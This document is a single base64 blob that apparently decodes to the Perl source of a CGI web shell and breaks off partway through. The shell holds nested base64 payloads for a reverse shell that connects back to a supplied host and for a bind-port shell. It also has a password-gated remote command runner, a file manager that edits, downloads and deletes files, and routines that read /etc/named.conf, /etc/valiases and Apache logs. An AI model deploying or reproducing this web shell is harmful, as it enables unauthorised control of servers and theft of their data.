S0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZAp7Cgl1c2UgTUlNRTo6QmFzZTY0OwoJdXNlIFNvY2tldDsJCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7CgkkYmluZHBlcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdVMjlqYTJWME93MEtKRUZTUjBNOVFFRlNSMVk3RFFva2NHOXlkQWs5SUNSQlVrZFdXekJkT3cwS0pIQnliM1J2Q1QwZ1oyVjBjSEp2ZEc5aWVXNWhiV1VvSjNSamNDY3BPdzBLSkZOb1pXeHNDVDBnSWk5aWFXNHZZbUZ6YUNJN0RRcHpiMk5yWlhRb1UwVlNWa1ZTTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2dKSEJ5YjNSdktXOXlJR1JwWlNBaWMyOWphMlYwT2lRaElqc05Dbk5sZEhOdlkydHZjSFFvVTBWU1ZrVlNMQ0JUVDB4ZlUwOURTMFZVTENCVFQxOVNSVlZUUlVGRVJGSXNJSEJoWTJzb0ltd2lMQ0F4S1NsdmNpQmthV1VnSW5ObGRITnZZMnR2Y0hRNklDUWhJanNOQ21KcGJtUW9VMFZTVmtWU0xDQnpiMk5yWVdSa2NsOXBiaWdrY0c5eWRDd2dTVTVCUkVSU1gwRk9XU2twYjNJZ1pHbGxJQ0ppYVc1a09pQWtJU0k3RFFwc2FYTjBaVzRvVTBWU1ZrVlNMQ0JUVDAxQldFTlBUazRwQ1FsdmNpQmthV1VnSW14cGMzUmxiam9nSkNFaU93MEtabTl5S0RzZ0pIQmhaR1J5SUQwZ1lXTmpaWEIwS0VOTVNVVk9WQ3dnVTBWU1ZrVlNLVHNnWTJ4dmMyVWdRMHhKUlU1VUtRMEtldzBLQ1c5d1pXNG9VMVJFU1U0c0lDSStKa05NU1VWT1ZDSXBPdzBLQ1c5d1pXNG9VMVJFVDFWVUxDQWlQaVpEVEVsRlRsUWlLVHNOQ2dsdmNHVnVLRk5VUkVWU1Vpd2dJajRtUTB4SlJVNVVJaWs3RFFvSmMzbHpkR1Z0S0NKMWJuTmxkQ0JJU1ZOVVJrbE1SVHNnZFc1elpYUWdVMEZXUlVoSlUxUWdPMlZqYUc4Z0oxc3JYU0JUZVhOMFpXMXBibVp2T2lBbk95QjFibUZ0WlNBdFlUdGxZMmh2TzJWamFHOGdKMXNyWFNCVmMyVnlhVzVtYnpvZ0p6c2dhV1E3WldOb2J6dGxZMmh2SUNkYksxMGdSR2x5WldOMGIzSjVPaUFuT3lCd2QyUTdaV05vYnpzZ1pXTm9ieUFuV3l0ZElGTm9aV3hzT2lBbk95UlRhR1ZzYkNJcE93MEtDV05zYjNObEtGTlVSRWxPS1RzTkNnbGpiRzl6WlNoVFZFUlBWVlFwT3cwS0NXTnNiM05sS0ZOVVJFVlNVaWs3RFFwOURRbz0iOwoKCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307CgkkQ2xpZW50UG9ydCA9IGludCgkaW57J2NsaWVudHBvcnQnfSk7CglpZigkQ2xpZW50UG9ydCBlcSAwKQoJewoJCXJldHVybiAmQmFja0JpbmRGb3JtOwoJfWVsc2lmKCEkQ2xpZW50QWRkciBlcSAiIikKCXsKCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiYWNrcGVybCk7CgkJaWYoLXcgIi90bXAvIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JhY2tjb25uZWN0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiYWNrY29ubmVjdC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmFja2Nvbm5lY3QucGwgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX1lbHNlCgl7CgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmluZHBlcmwpOwoJCWlmKC13ICIvdG1wIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JpbmRwb3J0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiaW5kcG9ydC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmluZHBvcnQucGwgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX0KfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgIEFycmF5IExpc3QgRGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJtRGlyKCQpIAp7CglteSAkZGlyID0gc2hpZnQ7CiAgICBpZihvcGVuZGlyKERJUiwkZGlyKSkKCXsKCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkKCQl7CgkJCWlmKCgkZmlsZSBuZSAiLiIpICYmICgkZmlsZSBuZSAiLi4iKSkKCQkJewoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7CgkJCQlpZigtZCAkZmlsZSkKCQkJCXsKCQkJCQkmUm1EaXIoJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXVubGluaygkZmlsZSk7CgkJCQl9CgkJCX0KCQl9CgkJY2xvc2VkaXIoRElSKTsKCX0KCWlmKCFybWRpcigkZGlyKSkKCXsKCQkKCX0KfQpzdWIgRmlsZU93bmVyKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJHVpZCwkZ2lkKSA9IChzdGF0KCRmaWxlKSlbNCw1XTsKCQlpZigkV2luTlQpCgkJewoJCQlyZXR1cm4gIj8/PyI7CgkJfQoJCWVsc2UKCQl7CgkJCSRuYW1lPWdldHB3dWlkKCR1aWQpOwoJCQkkZ3JvdXA9Z2V0Z3JnaWQoJGdpZCk7CgkJCXJldHVybiAkbmFtZS4iLyIuJGdyb3VwOwoJCX0KCX0KCXJldHVybiAiPz8/IjsKfQpzdWIgUGFyZW50Rm9sZGVyKCQpCnsKCW15ICRwYXRoID0gc2hpZnQ7CglteSAkQ29tbSA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkIC4uIi4kQ21kU2VwLiRDbWRQd2Q7CgljaG9wKCRwYXRoID0gYCRDb21tYCk7CglyZXR1cm4gJHBhdGg7Cn0Kc3ViIEZpbGVQZXJtcygkKQp7CglteSAkZmlsZSA9IHNoaWZ0OwoJbXkgJHVyID0gIi0iOwoJbXkgJHV3ID0gIi0iOwoJaWYoLWUgJGZpbGUpCgl7CgkJaWYoJFdpbk5UKQoJCXsKCQkJaWYoLXIgJGZpbGUpeyAkdXIgPSAiciI7IH0KCQkJaWYoLXcgJGZpbGUpeyAkdXcgPSAidyI7IH0KCQkJcmV0dXJuICR1ciAuICIgLyAiIC4gJHV3OwoJCX1lbHNlCgkJewoJCQkkbW9kZT0oc3RhdCgkZmlsZSkpWzJdOwoJCQkkcmVzdWx0ID0gc3ByaW50ZigiJTA0byIsICRtb2RlICYgMDc3NzcpOwoJCQlyZXR1cm4gJHJlc3VsdDsKCQl9Cgl9CglyZXR1cm4gIjAwMDAiOwp9CnN1YiBGaWxlTGFzdE1vZGlmaWVkKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJGxhKSA9IChzdGF0KCRmaWxlKSlbOV07CgkJKCRkLCRtLCR5LCRoLCRpKSA9IChsb2NhbHRpbWUoJGxhKSlbMyw0LDUsMiwxXTsKCQkkeSA9ICR5ICsgMTkwMDsKCQlAbW9udGggPSBxdy8xIDIgMyA0IDUgNiA3IDggOSAxMCAxMSAxMi87CgkJJGxtdGltZSA9IHNwcmludGYoIiUwMmQvJXMvJTRkICUwMmQ6JTAyZCIsJGQsJG1vbnRoWyRtXSwkeSwkaCwkaSk7CgkJcmV0dXJuICRsbXRpbWU7Cgl9CglyZXR1cm4gIj8/PyI7Cn0Kc3ViIEZpbGVTaXplKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZiAkZmlsZSkKCXsKCQlyZXR1cm4gLXMgJGZpbGU7Cgl9CglyZXR1cm4gIjAiOwoKfQpzdWIgUGFyc2VGaWxlU2l6ZSgkKQp7CglteSAkc2l6ZSA9IHNoaWZ0OwoJaWYoJHNpemUgPD0gMTAyNCkKCXsKCQlyZXR1cm4gJHNpemUuICIgQiI7Cgl9CgllbHNlCgl7CgkJaWYoJHNpemUgPD0gMTAyNCoxMDI0KSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4wMmYiLCRzaXplIC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIEtCIjsKCQl9CgkJZWxzZSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4yZiIsJHNpemUgLyAxMDI0IC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIE1CIjsKCQl9Cgl9Cn0Kc3ViIHRyaW0oJCkKewoJbXkgJHN0cmluZyA9IHNoaWZ0OwoJJHN0cmluZyA9fiBzL15ccysvLzsKCSRzdHJpbmcgPX4gcy9ccyskLy87CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgQWRkU2xhc2hlcygkKQp7CglteSAkc3RyaW5nID0gc2hpZnQ7Cgkkc3RyaW5nPX4gcy9cXC9cXFxcL2c7CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgTGlzdERpcgp7CglteSAkcGF0aCA9ICRDdXJyZW50RGlyLiRQYXRoU2VwOwoJJHBhdGg9fiBzL1xcXFwvXFwvZzsKCW15ICRyZXN1bHQgPSAiPGZvcm0gbmFtZT0nZicgYWN0aW9uPSckU2NyaXB0TG9jYXRpb24nPjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+UGF0aDogWyAiLiZBZGRMaW5rRGlyKCJndWkiKS4iIF0gPC9zcGFuPjxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdkJyBzaXplPSc0MCcgdmFsdWU9JyRDdXJyZW50RGlyJyAvPjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2EnIHZhbHVlPSdndWknPjxpbnB1dCBjbGFzcz0nc3VibWl0JyB0eXBlPSdzdWJtaXQnIHZhbHVlPSdDaGFuZ2UnPjwvZm9ybT4iOwoJaWYoLWQgJHBhdGgpCgl7CgkJbXkgQGZuYW1lID0gKCk7CgkJbXkgQGRuYW1lID0gKCk7CgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQoJCXsKCQkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpCgkJCXsKCQkJCSRmPSRwYXRoLiRmaWxlOwoJCQkJaWYoLWQgJGYpCgkJCQl7CgkJCQkJcHVzaChAZG5hbWUsJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXB1c2goQGZuYW1lLCRmaWxlKTsKCQkJCX0KCQkJfQoJCQljbG9zZWRpcihESVIpOwoJCX0KCQlAZm5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZm5hbWU7CgkJQGRuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGRuYW1lOwoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4KCgkJPHRyIHN0eWxlPSdiYWNrZ3JvdW5kLWNvbG9yOiAjM2UzZTNlJz48dGg+RmlsZSBOYW1lPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjEwMHB4Oyc+RmlsZSBTaXplPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+T3duZXI8L3RoPgoJCTx0aCBzdHlsZT0nd2lkdGg6MTAwcHg7Jz5QZXJtaXNzaW9uPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+TGFzdCBNb2RpZmllZDwvdGg+CgkJPHRoIHN0eWxlPSd3aWR0aDoyNjBweDsnPkFjdGlvbjwvdGg+PC90cj4iOwoJCW15ICRzdHlsZT0ibGluZSI7CgkJbXkgJGk9MDsKCQlmb3JlYWNoIG15ICRkIChAZG5hbWUpCgkJewoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOwoJCQkkZCA9ICZ0cmltKCRkKTsKCQkJJGRpcm5hbWU9JGQ7CgkJCWlmKCRkIGVxICIuLiIpIAoJCQl7CgkJCQkkZCA9ICZQYXJlbnRGb2xkZXIoJHBhdGgpOwoJCQl9CgkJCWVsc2lmKCRkIGVxICIuIikgCgkJCXsKCQkJCSRkID0gJHBhdGg7CgkJCX0KCQkJZWxzZSAKCQkJewoJCQkJJGQgPSAkcGF0aC4kZDsKCQkJfQoJCQkkcmVzdWx0IC49ICI8dHIgY2xhc3M9JyRzdHlsZSc+CgoJCQk8dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+PGEgIGhyZWY9Jz9hPWd1aSZkPSIuJGQuIic+WyAiLiRkaXJuYW1lLiIgXTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZD5ESVI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz4iLiZGaWxlT3duZXIoJGQpLiI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7JyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRkKS4iJywnIi4kZGlybmFtZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oIi4kaS4iLCciLiRkaXJuYW1lLiInKVwiID4iLiZGaWxlUGVybXMoJGQpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZCkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZGlybmFtZScsJyIuJkFkZFNsYXNoZXMoJkFkZFNsYXNoZXMoJGQpKS4iJylcIj5SZW5hbWU8L2E+ICB8IDxhIG9uY2xpY2s9XCJpZighY29uZmlybSgnUmVtb3ZlIGRpcjogJGRpcm5hbWUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9JHBhdGgmcmVtb3ZlPSRkaXJuYW1lJz5SZW1vdmU8L2E+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8L3RyPiI7CgkJCSRpKys7CgkJfQoJCWZvcmVhY2ggbXkgJGYgKEBmbmFtZSkKCQl7CgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlPSRmOwoJCQkkZiA9ICRwYXRoLiRmOwoJCQkkdmlldyA9ICI/ZGlyPSIuJHBhdGguIiZ2aWV3PSIuJGY7CgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7Jz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4kcGF0aC4iJmM9ZWRpdCUyMCIuJGZpbGUuIic+Ii4kZmlsZS4iPC9hPjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkPiIuJlBhcnNlRmlsZVNpemUoJkZpbGVTaXplKCRmKSkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPiIuJkZpbGVPd25lcigkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGYpLiInLCciLiRmaWxlLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgkaSwnJGZpbGUnKVwiID4iLiZGaWxlUGVybXMoJGYpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiRwYXRoLiImYz1lZGl0JTIwIi4kZmlsZS4iJz5FZGl0PC9hPiB8IDxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZmlsZScsJ2YnKVwiPlJlbmFtZTwvYT4gfCA8YSBocmVmPSc/YT1kb3dubG9hZCZvPWdvJmY9Ii4kZi4iJz5Eb3dubG9hZDwvYT4gfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBmaWxlOiAkZmlsZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0kcGF0aCZyZW1vdmU9JGZpbGUnPlJlbW92ZTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsKCQkJJGkrKzsKCQl9CgkJJHJlc3VsdCAuPSAiPC90YWJsZT48L2Rpdj4iOwoJfQoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRyeSB0byBWaWV3IExpc3QgVXNlcgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBWaWV3RG9tYWluVXNlcgp7CglvcGVuIChkb21haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJbXkgQGNuenMgPSA8ZG9tYWlucz47CgljbG9zZSBkMG1haW5zOwoJbXkgJHN0eWxlPSJsaW5lIjsKCW15ICRyZXN1bHQ9IjxoNT48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+SG9hbmcgU2EgLSBUcnVvbmcgU2E8L2ZvbnQ+PC9oNT4iOwoJaWYgKCRlcnIpCgl7CgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7CgkJcmV0dXJuICRyZXN1bHQ7Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJzx0YWJsZT48dHI+PHRoPkRvbWFpbnM8L3RoPiA8dGg+VXNlcjwvdGg+PC90cj4nOwoJfQoJZm9yZWFjaCBteSAkb25lIChAY256cykKCXsKCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCXsJCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlbmFtZT0gIi9ldGMvdmFsaWFzZXMvIi4kb25lOwoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCSRyZXN1bHQgLj0gJzx0ciBjbGFzcz0iJHN0eWxlIiB3aWR0aD01MCU+PHRkPicuJG9uZS4nIDwvdGQ+PHRkPiAnLiRvd25lci4nPC90ZD48L3RyPic7CgkJfQoJfQoJJHJlc3VsdCAuPSAnPC90YWJsZT4nOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFZpZXcgTG9nCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFZpZXdMb2cKewoJaWYoJFdpbk5UKQoJewoJCXJldHVybiAiPGgyPjxmb250IHN0eWxlPSdmb250OiAyMHB0IFZlcmRhbmE7Y29sb3I6ICNmZjk5MDA7Jz5Eb24ndCBydW4gb24gV2luZG93czwvZm9udD48L2gyPiI7Cgl9CglteSAkcmVzdWx0PSI8dGFibGU+PHRyPjx0aD5QYXRoIExvZzwvdGg+PHRoPlN1Ym1pdDwvdGg+PC90cj4iOwoJbXkgQHBhdGhsb2c9KAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nJywKCQkJCScvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2cnLAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZycKCQkJCSk7CglteSAkaT0wOwoJbXkgJHBlcm1zOwoJbXkgJHNsOwoJZm9yZWFjaCBteSAkbG9nIChAcGF0aGxvZykKCXsKCQlpZigtdyAkbG9nKQoJCXsKCQkJJHBlcm1zPSJPSyI7CgkJfWVsc2UKCQl7CgkJCWNob3AoJHNsID0gYGxuIC1zICRsb2cgZXJyb3JfbG9nXyRpYCk7CgkJCWlmKCZ0cmltKCRscykgZXEgIiIpCgkJCXsKCQkJCWlmKC1yICRscykKCQkJCXsKCQkJCQkkcGVybXM9Ik9LIjsKCQkJCQkkbG9nPSJlcnJvcl9sb2dfIi4kaTsKCQkJCX0KCQkJfWVsc2UKCQkJewoJCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7CgkJCX0KCQl9CgkJJHJlc3VsdCAuPTw8RU5EOwoJCTx0cj4KCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgoJCQk8dGQ+PGlucHV0IHR5cGU9InRleHQiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsb2dfJGknKS52YWx1ZT0nbGVzredICsgdGhpcy52YWx1ZTsiIHZhbHVlPSIkbG9nIiBzaXplPSc1MCcvPjwvdGQ+CgkJCTx0ZD48aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVHJ5IiAvPjwvdGQ+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJsb2dfJGkiIG5hbWU9ImMiIHZhbHVlPSJsZXNzICRsb2ciLz4KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiIC8+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciIgLz4KCQkJPC9mb3JtPgoJCQk8dGQ+JHBlcm1zPC90ZD4KCgkJPC90cj4KRU5ECgkJJGkrKzsKCX0KCSRyZXN1bHQgLj0iPC90YWJsZT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiZSZWFkUGFyc2U7CiZHZXRDb29raWVzOwoKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9OwokUnVuQ29tbWFuZCA9ICRpbnsnYyd9OwokVHJhbnNmZXJGaWxlID0gJGlueydmJ307CiRPcHRpb25zID0gJGlueydvJ307CiRBY3Rpb24gPSAkaW57J2EnfTsKCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAmdHJpbSgkaW57J2QnfSk7CiMgbWFjIGRpbmggeHVhdCB0aG9uZyB0aW4gbmV1IGtvIGNvIGxlbmggbmFvIQokUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSIgaWYoJFJ1bkNvbW1hbmQgZXEgIiIpOwpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7CgokTG9nZ2VkSW4gPSAkQ29va2llc3snU0FWRURQV0QnfSBlcSAkUGFzc3dvcmQ7CgppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgCQkjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luCnsKCSZQZXJmb3JtTG9naW47Cn1lbHNpZigkQWN0aW9uIGVxICJndWkiKSAjIEdVSSBkaXJlY3RvcnkKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCEkV2luTlQpCgl7CgkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCWlmKCEoJGNobW9kIGVxIDApKQoJCXsKCQkJJGNobW9kPWludCgkaW57J2